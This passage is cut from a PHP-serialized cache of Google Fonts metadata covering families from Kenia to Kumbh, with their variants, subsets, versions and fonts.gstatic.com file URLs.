s/kenia/v24/jizURE5PuHQH9qCONUGswfGM.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:603;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Khand\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:69:\"http://fonts.gstatic.com/s/khand/v14/TwMN-IINQlQQ0bL5cFE3ZwaH__-C.ttf\";s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/khand/v14/TwMA-IINQlQQ0YpVWHU_TBqO.ttf\";s:3:\"500\";s:69:\"http://fonts.gstatic.com/s/khand/v14/TwMN-IINQlQQ0bKhcVE3ZwaH__-C.ttf\";s:3:\"600\";s:69:\"http://fonts.gstatic.com/s/khand/v14/TwMN-IINQlQQ0bKNdlE3ZwaH__-C.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/khand/v14/TwMN-IINQlQQ0bLpd1E3ZwaH__-C.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:604;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Khmer\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"khmer\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/khmer/v25/MjQImit_vPPwpF-BpN2EeYmD.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:605;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Khula\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:69:\"http://fonts.gstatic.com/s/khula/v12/OpNPnoEOns3V7G-ljCvUrC59XwXD.ttf\";s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/khula/v12/OpNCnoEOns3V7FcJpA_chzJ0.ttf\";s:3:\"600\";s:69:\"http://fonts.gstatic.com/s/khula/v12/OpNPnoEOns3V7G_RiivUrC59XwXD.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/khula/v12/OpNPnoEOns3V7G-1iyvUrC59XwXD.ttf\";s:3:\"800\";s:69:\"http://fonts.gstatic.com/s/khula/v12/OpNPnoEOns3V7G-piCvUrC59XwXD.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:606;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Kings\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:64:\"http://fonts.gstatic.com/s/kings/v5/8AtnGsK4O5CYXU_Iq6GSPaHS.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:607;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Kirang Haerang\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/kiranghaerang/v20/E21-_dn_gvvIjhYON1lpIU4-bcqvWPaJq4no.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:608;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Kite One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/kiteone/v20/70lQu7shLnA_E02vyq1b6HnGO4uA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:609;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Kiwi Maru\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":3:{s:3:\"300\";s:78:\"http://fonts.gstatic.com/s/kiwimaru/v14/R70djykGkuuDep-hRg6gNCi0Vxn9R5ShnA.ttf\";s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/kiwimaru/v14/R70YjykGkuuDep-hRg6YmACQXzLhTg.ttf\";s:3:\"500\";s:78:\"http://fonts.gstatic.com/s/kiwimaru/v14/R70djykGkuuDep-hRg6gbCm0Vxn9R5ShnA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:610;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Klee One\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"600\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:9:\"greek-ext\";i:2;s:8:\"japanese\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/kleeone/v7/LDIxapCLNRc6A8oT4q4AOeekWPrP.ttf\";s:3:\"600\";s:74:\"http://fonts.gstatic.com/s/kleeone/v7/LDI2apCLNRc6A8oT4pbYF8Osc-bGkqIw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:611;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Knewave\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/knewave/v14/sykz-yx0lLcxQaSItSq9-trEvlQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:612;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"KoHo\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:7:\"regular\";i:5;s:6:\"italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":12:{s:3:\"200\";s:67:\"http://fonts.gstatic.com/s/koho/v16/K2FxfZ5fmddNPuE1WJ75JoKhHys.ttf\";s:9:\"200italic\";s:70:\"http://fonts.gstatic.com/s/koho/v16/K2FzfZ5fmddNNisssJ_zIqCkDyvqZA.ttf\";s:3:\"300\";s:67:\"http://fonts.gstatic.com/s/koho/v16/K2FxfZ5fmddNPoU2WJ75JoKhHys.ttf\";s:9:\"300italic\";s:70:\"http://fonts.gstatic.com/s/koho/v16/K2FzfZ5fmddNNiss1JzzIqCkDyvqZA.ttf\";s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/koho/v16/K2F-fZ5fmddNBikefJbSOos.ttf\";s:6:\"italic\";s:66:\"http://fonts.gstatic.com/s/koho/v16/K2FwfZ5fmddNNisUeLTXKou4Bg.ttf\";s:3:\"500\";s:67:\"http://fonts.gstatic.com/s/koho/v16/K2FxfZ5fmddNPt03WJ75JoKhHys.ttf\";s:9:\"500italic\";s:70:\"http://fonts.gstatic.com/s/koho/v16/K2FzfZ5fmddNNissjJ3zIqCkDyvqZA.ttf\";s:3:\"600\";s:67:\"http://fonts.gstatic.com/s/koho/v16/K2FxfZ5fmddNPvEwWJ75JoKhHys.ttf\";s:9:\"600italic\";s:70:\"http://fonts.gstatic.com/s/koho/v16/K2FzfZ5fmddNNissoJrzIqCkDyvqZA.ttf\";s:3:\"700\";s:67:\"http://fonts.gstatic.com/s/koho/v16/K2FxfZ5fmddNPpUxWJ75JoKhHys.ttf\";s:9:\"700italic\";s:70:\"http://fonts.gstatic.com/s/koho/v16/K2FzfZ5fmddNNissxJvzIqCkDyvqZA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:613;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Kodchasan\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:7:\"regular\";i:5;s:6:\"italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":12:{s:3:\"200\";s:79:\"http://fonts.gstatic.com/s/kodchasan/v16/1cX0aUPOAJv9sG4I-DJeR1Cggeqo3eMeoA.ttf\";s:9:\"200italic\";s:81:\"http://fonts.gstatic.com/s/kodchasan/v16/1cXqaUPOAJv9sG4I-DJWjUlIgOCs_-YOoIgN.ttf\";s:3:\"300\";s:79:\"http://fonts.gstatic.com/s/kodchasan/v16/1cX0aUPOAJv9sG4I-DJeI1Oggeqo3eMeoA.ttf\";s:9:\"300italic\";s:81:\"http://fonts.gstatic.com/s/kodchasan/v16/1cXqaUPOAJv9sG4I-DJWjUksg-Cs_-YOoIgN.ttf\";s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/kodchasan/v16/1cXxaUPOAJv9sG4I-DJmj3uEicG01A.ttf\";s:6:\"italic\";s:77:\"http://fonts.gstatic.com/s/kodchasan/v16/1cX3aUPOAJv9sG4I-DJWjXGAq8Sk1PoH.ttf\";s:3:\"500\";s:79:\"http://fonts.gstatic.com/s/kodchasan/v16/1cX0aUPOAJv9sG4I-DJee1Kggeqo3eMeoA.ttf\";s:9:\"500italic\";s:81:\"http://fonts.gstatic.com/s/kodchasan/v16/1cXqaUPOAJv9sG4I-DJWjUl0guCs_-YOoIgN.ttf\";s:3:\"600\";s:79:\"http://fonts.gstatic.com/s/kodchasan/v16/1cX0aUPOAJv9sG4I-DJeV1Wggeqo3eMeoA.ttf\";s:9:\"600italic\";s:81:\"http://fonts.gstatic.com/s/kodchasan/v16/1cXqaUPOAJv9sG4I-DJWjUlYheCs_-YOoIgN.ttf\";s:3:\"700\";s:79:\"http://fonts.gstatic.com/s/kodchasan/v16/1cX0aUPOAJv9sG4I-DJeM1Sggeqo3eMeoA.ttf\";s:9:\"700italic\";s:81:\"http://fonts.gstatic.com/s/kodchasan/v16/1cXqaUPOAJv9sG4I-DJWjUk8hOCs_-YOoIgN.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:614;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Koh Santepheap\";s:8:\"variants\";a:5:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"700\";i:4;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"100\";s:87:\"http://fonts.gstatic.com/s/kohsantepheap/v9/gNMfW3p6SJbwyGj2rBZyeOrTjNuFHVyTtjNJUWU.ttf\";s:3:\"300\";s:88:\"http://fonts.gstatic.com/s/kohsantepheap/v9/gNMeW3p6SJbwyGj2rBZyeOrTjNtNP3y5mD9ASHz5.ttf\";s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/kohsantepheap/v9/gNMdW3p6SJbwyGj2rBZyeOrTjOPhF1ixsyNJ.ttf\";s:3:\"700\";s:88:\"http://fonts.gstatic.com/s/kohsantepheap/v9/gNMeW3p6SJbwyGj2rBZyeOrTjNtdOHy5mD9ASHz5.ttf\";s:3:\"900\";s:88:\"http://fonts.gstatic.com/s/kohsantepheap/v9/gNMeW3p6SJbwyGj2rBZyeOrTjNtlOny5mD9ASHz5.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:615;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Kolker Brush\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/kolkerbrush/v3/iJWDBXWRZjfKWdvmzwvvog3-7KJ6x8qNUQ.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:616;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Kosugi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/kosugi/v14/pxiFyp4_v8FCjlI4NLr6f1pdEQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:617;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Kosugi Maru\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/kosugimaru/v14/0nksC9PgP_wGh21A2KeqGiTqivr9iBq_.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:618;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Kotta One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/kottaone/v20/S6u_w41LXzPc_jlfNWqPHA3s5dwt7w.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:619;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Koulen\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/koulen/v25/AMOQz46as3KIBPeWgnA9kuYMUg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:620;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Kranky\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/kranky/v24/hESw6XVgJzlPsFnMpheEZo_H_w.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:621;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Kreon\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v32\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:83:\"http://fonts.gstatic.com/s/kreon/v32/t5t9IRIUKY-TFF_LW5lnMR3v2DnvPNimejUfp2dWNg.ttf\";s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/kreon/v32/t5t9IRIUKY-TFF_LW5lnMR3v2DnvYtimejUfp2dWNg.ttf\";s:3:\"500\";s:83:\"http://fonts.gstatic.com/s/kreon/v32/t5t9IRIUKY-TFF_LW5lnMR3v2DnvUNimejUfp2dWNg.ttf\";s:3:\"600\";s:83:\"http://fonts.gstatic.com/s/kreon/v32/t5t9IRIUKY-TFF_LW5lnMR3v2DnvvN-mejUfp2dWNg.ttf\";s:3:\"700\";s:83:\"http://fonts.gstatic.com/s/kreon/v32/t5t9IRIUKY-TFF_LW5lnMR3v2Dnvhd-mejUfp2dWNg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:622;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Kristi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/kristi/v17/uK_y4ricdeU6zwdRCh0TMv6EXw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:623;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Krona One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/kronaone/v14/jAnEgHdjHcjgfIb1ZcUCMY-h3cWkWg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:624;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Krub\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:7:\"regular\";i:5;s:6:\"italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v9\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":12:{s:3:\"200\";s:66:\"http://fonts.gstatic.com/s/krub/v9/sZlEdRyC6CRYZo47KLF4R6gWaf8.ttf\";s:9:\"200italic\";s:69:\"http://fonts.gstatic.com/s/krub/v9/sZlGdRyC6CRYbkQiwLByQ4oTef_6gQ.ttf\";s:3:\"300\";s:66:\"http://fonts.gstatic.com/s/krub/v9/sZlEdRyC6CRYZuo4KLF4R6gWaf8.ttf\";s:9:\"300italic\";s:69:\"http://fonts.gstatic.com/s/krub/v9/sZlGdRyC6CRYbkQipLNyQ4oTef_6gQ.ttf\";s:7:\"regular\";s:62:\"http://fonts.gstatic.com/s/krub/v9/sZlLdRyC6CRYXkYQDLlTW6E.ttf\";s:6:\"italic\";s:65:\"http://fonts.gstatic.com/s/krub/v9/sZlFdRyC6CRYbkQaCJtWS6EPcA.ttf\";s:3:\"500\";s:66:\"http://fonts.gstatic.com/s/krub/v9/sZlEdRyC6CRYZrI5KLF4R6gWaf8.ttf\";s:9:\"500italic\";s:69:\"http://fonts.gstatic.com/s/krub/v9/sZlGdRyC6CRYbkQi_LJyQ4oTef_6gQ.ttf\";s:3:\"600\";s:66:\"http://fonts.gstatic.com/s/krub/v9/sZlEdRyC6CRYZp4-KLF4R6gWaf8.ttf\";s:9:\"600italic\";s:69:\"http://fonts.gstatic.com/s/krub/v9/sZlGdRyC6CRYbkQi0LVyQ4oTef_6gQ.ttf\";s:3:\"700\";s:66:\"http://fonts.gstatic.com/s/krub/v9/sZlEdRyC6CRYZvo_KLF4R6gWaf8.ttf\";s:9:\"700italic\";s:69:\"http://fonts.gstatic.com/s/krub/v9/sZlGdRyC6CRYbkQitLRyQ4oTef_6gQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:625;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Kufam\";s:8:\"variants\";a:12:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:6:\"italic\";i:7;s:9:\"500italic\";i:8;s:9:\"600italic\";i:9;s:9:\"700italic\";i:10;s:9:\"800italic\";i:11;s:9:\"900italic\";}s:7:\"subsets\";a:4:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":12:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/kufam/v20/C8c-4cY7pG7w_oSJDszBXsKCcBH3lqk7qQCJHvIwYg.ttf\";s:3:\"500\";s:83:\"http://fonts.gstatic.com/s/kufam/v20/C8c-4cY7pG7w_oSJDszBXsKCcBH3pKk7qQCJHvIwYg.ttf\";s:3:\"600\";s:83:\"http://fonts.gstatic.com/s/kufam/v20/C8c-4cY7pG7w_oSJDszBXsKCcBH3SK47qQCJHvIwYg.ttf\";s:3:\"700\";s:83:\"http://fonts.gstatic.com/s/kufam/v20/C8c-4cY7pG7w_oSJDszBXsKCcBH3ca47qQCJHvIwYg.ttf\";s:3:\"800\";s:83:\"http://fonts.gstatic.com/s/kufam/v20/C8c-4cY7pG7w_oSJDszBXsKCcBH3Fq47qQCJHvIwYg.ttf\";s:3:\"900\";s:83:\"http://fonts.gstatic.com/s/kufam/v20/C8c-4cY7pG7w_oSJDszBXsKCcBH3P647qQCJHvIwYg.ttf\";s:6:\"italic\";s:85:\"http://fonts.gstatic.com/s/kufam/v20/C8c84cY7pG7w_q6APDMZN6kY3hbiXurT6gqNPPcgYp0i.ttf\";s:9:\"500italic\";s:85:\"http://fonts.gstatic.com/s/kufam/v20/C8c84cY7pG7w_q6APDMZN6kY3hbiXurh6gqNPPcgYp0i.ttf\";s:9:\"600italic\";s:85:\"http://fonts.gstatic.com/s/kufam/v20/C8c84cY7pG7w_q6APDMZN6kY3hbiXuoN7QqNPPcgYp0i.ttf\";s:9:\"700italic\";s:85:\"http://fonts.gstatic.com/s/kufam/v20/C8c84cY7pG7w_q6APDMZN6kY3hbiXuo07QqNPPcgYp0i.ttf\";s:9:\"800italic\";s:85:\"http://fonts.gstatic.com/s/kufam/v20/C8c84cY7pG7w_q6APDMZN6kY3hbiXupT7QqNPPcgYp0i.ttf\";s:9:\"900italic\";s:85:\"http://fonts.gstatic.com/s/kufam/v20/C8c84cY7pG7w_q6APDMZN6kY3hbiXup67QqNPPcgYp0i.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:626;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Kulim Park\";s:8:\"variants\";a:10:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:7:\"regular\";i:5;s:6:\"italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":10:{s:3:\"200\";s:80:\"http://fonts.gstatic.com/s/kulimpark/v14/fdN49secq3hflz1Uu3IwjJYNwa5aZbUvGjU.ttf\";s:9:\"200italic\";s:83:\"http://fonts.gstatic.com/s/kulimpark/v14/fdNm9secq3hflz1Uu3IwhFwUKa9QYZcqCjVVUA.ttf\";s:3:\"300\";s:80:\"http://fonts.gstatic.com/s/kulimpark/v14/fdN49secq3hflz1Uu3IwjPIOwa5aZbUvGjU.ttf\";s:9:\"300italic\";s:83:\"http://fonts.gstatic.com/s/kulimpark/v14/fdNm9secq3hflz1Uu3IwhFwUTaxQYZcqCjVVUA.ttf\";s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/kulimpark/v14/fdN79secq3hflz1Uu3IwtF4m5aZxebw.ttf\";s:6:\"italic\";s:79:\"http://fonts.gstatic.com/s/kulimpark/v14/fdN59secq3hflz1Uu3IwhFws4YR0abw2Aw.ttf\";s:3:\"600\";s:80:\"http://fonts.gstatic.com/s/kulimpark/v14/fdN49secq3hflz1Uu3IwjIYIwa5aZbUvGjU.ttf\";s:9:\"600italic\";s:83:\"http://fonts.gstatic.com/s/kulimpark/v14/fdNm9secq3hflz1Uu3IwhFwUOapQYZcqCjVVUA.ttf\";s:3:\"700\";s:80:\"http://fonts.gstatic.com/s/kulimpark/v14/fdN49secq3hflz1Uu3IwjOIJwa5aZbUvGjU.ttf\";s:9:\"700italic\";s:83:\"http://fonts.gstatic.com/s/kulimpark/v14/fdNm9secq3hflz1Uu3IwhFwUXatQYZcqCjVVUA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:627;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Kumar One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"gujarati\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/kumarone/v17/bMr1mS-P958wYi6YaGeGNO6WU3oT0g.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:628;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Kumar One Outline\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"gujarati\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/kumaroneoutline/v17/Noao6VH62pyLP0fsrZ-v18wlUEcX9zDwRQu8EGKF.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:629;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Kumbh 